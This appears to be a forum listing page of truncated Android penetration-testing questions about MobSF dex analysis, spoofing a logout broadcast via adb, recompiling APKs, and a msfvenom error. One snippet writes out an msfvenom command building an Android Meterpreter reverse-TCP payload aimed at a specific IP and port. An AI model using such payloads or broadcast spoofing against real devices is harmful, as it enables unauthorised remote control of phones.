Category : penetration-testing

I have several dex files that needs to be statically analyzed by mobsf after unpacking the apk file because core code are inaccessible prior to unpacking. What I’ve tried: Adding Line 3 and changing line 4 from glob_pattern = app_dir + *.dex’ to glob_pattern = ddex_dir def get_dex_files(app_dir): """Get all Dex Files for analysis.""" ddex_dir ..

Read more

So I’m trying to spoof a broadcast using adb shell. The code of the broadcaster in manifest file and the source code is as follows: Manifest file : <receiver android:name="com.caressa.libs.healthprio.logout.LogoutBroadcastReceiver"> <intent-filter android:priority="1000000"> <action android:name="com.caressa.libs.healthprio.activity.logout"/> <category android:name="com.caressa.libs.healthprio"/> </intent-filter> </receiver> The source code of Broadcaster: public class LogoutBroadcastReceiver extends BroadcastReceiver { public static String action = "com.caressa.libs.healthprio.activity.logout"; ..

Read more

I want to test the behavior of a recompiled APK on an Android Device without any changes. After I decompiled using Apktool 2.4.1 with default flags, then compiled without any errors/warning I signed the recompiled Apk and installed it on a non-rooted device. I tried to run the Apk on the device but sadly it ..

Read more

I’m a beginner.. I’m trying to create an android payload on termux but I’m encountering an error. "No encoder specified, outputting raw payload Payload size: 10186 bytes Saved as: R msf5 > Here’s the command. I’m using metasploit version 5. Msfv5 any help I’ll be glad thank you in advance. msfvenom -p android/meterpreter/reverse_tcp LHOST=197.156.137.153 LPORT=4444 ..

Read more